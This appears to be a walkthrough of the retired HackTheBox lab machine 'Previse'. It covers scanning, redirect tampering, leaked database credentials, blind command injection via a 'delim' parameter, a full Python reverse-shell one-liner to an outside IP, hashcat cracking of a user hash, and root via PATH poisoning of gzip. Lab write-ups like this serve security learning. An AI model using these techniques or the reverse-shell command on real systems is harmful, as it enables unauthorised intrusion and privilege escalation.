Previse Hackthebox writeup

3 minute read

In this Writeup you will find walkthrough of the retired machine previse From Hackthebox

image

export IP=10.10.11.104

scanning :

intial

sudo nmap -sV -vv $IP -oN nmap/intial
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))

visiting the web page :

image

tried some sqli but not worked

directory brute-force :

$ gobuster dir -u http://10.10.11.104/ -w /usr/share/dirb/wordlists/big.txt -x php,txt

found :

/accounts.php         (Status: 302) [Size: 3994] [--> login.php]
/config.php           (Status: 200) [Size: 0]
/download.php         (Status: 302) [Size: 0] [--> login.php]
/files.php            (Status: 302) [Size: 4914] [--> login.php]

you can use curl without enabling redirect and will notice the same thing immediately

curl http://10.10.11.104/accounts.php -vvv

But i opened up my burpsuite and observe the requests and response for /accounts.php

  • there is a redirect happen to /login.php again .
  • i do intercept the redirect and found :

image

hence i want to view and interact with this page , i changed the HTTP 302 redirect to HTTP 200 OK

image

forward it :

image

i made an account and then redirected me to /login.php again so i logged in successfully

image

navigating through the tabs found :

image

so i downloaded the backup and found :

image

in config.php :

<?php

function connectDB(){
    $host = 'localhost';
    $user = 'root';
    $passwd = 'mySQL_p@ssw0rd!:)';
    $db = 'previse';
    $mycon = new mysqli($host, $user, $passwd, $db);
    return $mycon;
}

?>

after some navigating in the files : in /logs.php

image

  • so we can see the exec function which most likely indicating RCE , and python is executing on a script and seems the script saves output in out.log .

  • understanding the logic at my local machine :

image

  • so we can inject any command like : delim=comma;INJECTION However it won’t be printed in logs.out so it is a Blind RCE .
  • we can get a shell immediatley

[+] from here

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.120",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

image

image

# stablizie the shell
$ python -c "import pty;pty.spawn('/bin/bash')"

hence we are in the machine now so we can access local host and view data base :D

mysql -h localhost -u root -p previse

mysql> SELECT table_name FROM information_schema.tables;

image

  • so we need m4lware password only i guess :3 let’s get it and try crack the hash from here: https://gist.github.com/dwallraff/6a50b5d2649afeb1803757560c176401

  • we can see it is a md5crypt hash

$ hashcat -m 500 -a 0 hashed_m4lware /usr/share/wordlists/rockyou.txt
# 500 : md5crypt
# 0   : straight attack mode
# output :
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!

image

privilege escalation

image

so let’s read the script :

#!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here

# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time

gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz

  • so it simply makes a backup for the logs with gzip .
  • we should focus on how to manipulate gzip .

PATH poisoning

  • we can see here : https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/

we can use that so when we execute this as root “with sudo” gzip will refer to the /tmp in the path

image

i don’t know why but the shell doesn’t return any result although i gained the root access so i make a reverse shell and it worked perfectly

image

Pwned